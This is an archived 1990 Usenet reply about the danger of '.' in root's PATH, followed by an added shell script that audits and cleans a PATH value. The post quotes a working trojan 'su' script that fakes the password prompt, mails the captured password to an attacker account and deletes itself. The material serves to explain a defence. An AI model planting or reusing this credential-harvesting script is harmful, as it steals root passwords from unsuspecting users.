Path: utzoo!utgpu!watserv1!watmath!att!tut.cis.ohio-state.edu!cs.utexas.edu!usc!samsung!rex!ames!dftsrv!iris613!merritt
From: merritt@iris613.gsfc.nasa.gov (John H Merritt)
Newsgroups: comp.sys.sgi
Subject: Re: . in $path
Message-ID: <1630@dftsrv.gsfc.nasa.gov>
Date: 12 Apr 90 18:07:48 GMT
References: <283:doelz@urz.unibas.ch>
Sender: news@dftsrv.gsfc.nasa.gov
Reply-To: merritt@iris613.UUCP (John H Merritt)
Organization: Goddard Space Flight Center Climate and Radiation Branch
Lines: 35

In article <283:doelz@urz.unibas.ch> doelz@urz.unibas.ch (Reinhard Doelz) writes:
>
>
>The *root* may not use it, otherwise it's fine. Imagine you're su'ing around
>and some weird guy aliased ls to rm.
                    ^^^^^^^ <-- he means, has a command or program named ...

More concretely, it prevents someone from gaining root capabilities through a
trojan horse. Consider the following program, from UNIX Today, April 2, 1990.

    #!/bin/sh
    # Trojan "su": planted under the name su in a writable directory and run
    # whenever "." is searched before the real su's directory in the victim's PATH.
    Chump=${1:-root}            # su with no argument targets root
    stty -echo                  # hide the typed password, as the real su does
    printf "Password:"          # same prompt as su, no newline
    read ChumpsPwd
    echo ""
    stty echo
    echo "$Chump's passwd is $ChumpsPwd" | mail cybrpunk   # exfiltrate by mail
    sleep 1
    echo "su:Sorry"             # imitate su's failure message
    rm su                       # remove the evidence (cwd is the planted directory)

This program is placed in every publicly writable directory, and eventually
someone will execute it; it reports failure the first time, and the user thinks
he typed the wrong password and never knows he just gave the root password
away.

Another popular trojan horse is 'ls'.

If you must have '.' in the path, it should be last.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
John H. Merritt                 # Yesterday I knew nothing,
Applied Research Corporation    # Today I know that.
merritt@iris613.gsfc.nasa.gov   #
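The check a practitioner would want after reading the above, added here as an example and not part of the original post or of the UNIX Today program: a POSIX sh audit of a PATH value that flags every entry that resolves to the current directory ("." or an empty entry, which the shell treats the same way), every relative entry, and every world-writable directory, which is exactly where the trojan su would be planted. The function names audit_path and sanitize_path, the messages they print, and the use of find to test for world-writability are my own assumptions; nothing below is from the post.

```shell
#!/bin/sh
# Added example, not from the original post: audit a PATH value for the
# trojan-horse exposure discussed above. Assumes a POSIX sh and POSIX find.

# audit_path PATHVALUE
#   Prints one line per risky entry. Returns 0 if nothing was flagged, 1 otherwise.
#   An empty entry (two adjacent colons, or a leading/trailing colon) means the
#   current directory, exactly like ".".
audit_path() {
    _rest="$1:"          # trailing ":" so the loop also sees the final entry
    _pos=0
    _found=0
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        _pos=$((_pos + 1))
        case "$_entry" in
        ''|.)
            # Whatever directory the victim happens to be in gets searched;
            # worse when other entries (the real su) come after it.
            if [ -z "$_rest" ]; then
                echo "entry $_pos: current directory (searched last)"
            else
                echo "entry $_pos: current directory (searched before later entries)"
            fi
            _found=1 ;;
        /*)
            # Absolute entry: risky only if anyone can create files in it.
            # "$_entry/." makes find look at the directory, not at a symlink to it.
            if [ -d "$_entry" ] && \
               [ -n "$(find "$_entry/." -prune -perm -0002 -print 2>/dev/null)" ]; then
                echo "entry $_pos: $_entry is world-writable"
                _found=1
            fi ;;
        *)
            # Relative entry such as "bin": resolved against the current
            # directory, so it is "." with extra steps.
            echo "entry $_pos: relative entry '$_entry'"
            _found=1 ;;
        esac
    done
    return $_found
}

# sanitize_path PATHVALUE
#   Prints PATHVALUE with ".", empty and relative entries dropped and duplicates
#   removed, keeping the order of the remaining absolute entries.
sanitize_path() {
    _rest="$1:"
    _out=""
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        case "$_entry" in
        /*)
            case ":$_out:" in
            *":$_entry:"*) ;;                     # already present
            *) _out="${_out:+$_out:}$_entry" ;;
            esac ;;
        *) ;;                                     # drop "", "." and relative entries
        esac
    done
    printf '%s\n' "$_out"
}

# Usage: audit the live PATH and suggest a cleaned one if anything was flagged.
if audit_path "$PATH"; then
    echo "PATH looks clean: $PATH"
else
    echo "suggested PATH: $(sanitize_path "$PATH")"
fi
```

Run it as root in particular, since that is the account Reinhard's point is about; a world-writable directory is flagged even when it carries the sticky bit, because the sticky bit stops others from deleting your files but not from creating a new one named su.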